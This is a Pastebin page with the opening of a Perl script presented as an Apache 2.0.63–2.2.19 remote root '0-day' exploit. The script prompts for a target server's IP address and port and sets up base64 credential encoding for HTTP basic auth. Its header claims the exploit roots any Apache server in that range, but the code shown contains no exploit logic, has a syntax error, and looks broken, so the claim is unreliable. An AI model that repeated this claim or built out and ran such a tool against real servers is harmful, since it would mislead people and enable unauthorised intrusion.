Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- #
- # Apache 2.0.63 - 2.2.19 Remote Exploit
- #
- # This 0-day exploit will remotely gain root on any apache server from version 2.0.63 to 2.2.19
- # Beta release 2.3.12-beta was also compromised by an affiliate - need verification
- # Base64 Encoder
- # Authentication with the server via HTTP's basic auth, input string
- # to encode BASE64 , and '%s' for credentials. eg base64 %s
- # output base64 userid:password
- # If your decoder requires you to use STDIN to pass the password
- # (no pun intended), set $BASE64_USE_STDIN to nonzero and do not
- # use '%s' on the command-line.
- $BASE64_CMD_STRING = "use_base64_encoder_here %s";
- # Base64 encoder pipe
- # Encoder passwd output to STDIN, set to non-zero val.
- $BASE64_USE_STDIN = 0'
- # Base64 encoder input handling
- #
- # Encoder requires newline after credentials,
- # set this to your newline char
- $BASE64_WRITE_NEWLINE = "";
- use IO::Socket;
- print STDOUT "Apache 2.0.63 - 2.2.19 Remote 0-day Exploit\r\n";
- print STDOUT "Enter ip addr of apache server: ";
- $line = <STDIN>;
- $host = mychomp($line);
- print STDOUT "Enter port of apache server \[80\]: ";
- $line = <STDIN>;
- $port = mychomp($line);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement